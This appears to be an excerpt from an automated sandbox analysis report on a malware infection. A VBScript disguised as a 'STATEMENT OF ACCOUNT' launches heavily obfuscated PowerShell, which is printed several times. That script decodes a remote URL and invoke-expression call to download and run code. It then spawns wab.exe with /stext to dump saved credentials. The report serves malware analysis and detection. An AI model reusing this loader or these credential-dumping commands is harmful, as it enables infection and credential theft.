                Source: wab.exe, 0000000A.00000002.2348783900.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347963788.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2374444370.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371429800.00000000034F9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-32947
                Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt 
Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf 
';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
